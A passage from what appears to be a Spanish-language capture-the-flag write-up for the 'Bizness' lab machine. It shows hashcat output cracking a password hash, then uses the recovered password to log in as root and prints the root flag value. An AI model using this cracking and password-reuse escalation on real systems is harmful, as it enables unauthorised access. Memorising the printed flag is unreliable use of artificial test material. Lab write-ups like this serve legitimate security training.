Speed.#1.........: 2056.5 kH/s (0.09ms) @ Accel:256 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 1478656/14344385 (10.31%)
Rejected.........: 0/1478656 (0.00%)
Restore.Point....: 1477632/14344385 (10.30%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: montano13 -> monkey-moo
Hardware.Mon.#1..: Util: 57%
Started: Thu May 30 16:11:40 2024
Stopped: Thu May 30 16:11:57 2024
Y con el 120 sacamos la pass monkeybizness y entrar al panel administrador
Si pruebo esta pass con el user root en la máquina también conseguimos acceso
ofbiz@bizness:/opt/ofbiz/runtime/data/derby/ofbiz/seg0$ su root
Password:
root@bizness:/opt/ofbiz/runtime/data/derby/ofbiz/seg0# whoami
root
ROOT FLAG
---------------------------
---------------------------
root@bizness:~# ls
root.txt
root@bizness:~# cat root.txt
96667f3655e098c6a70bb91d31cb07dd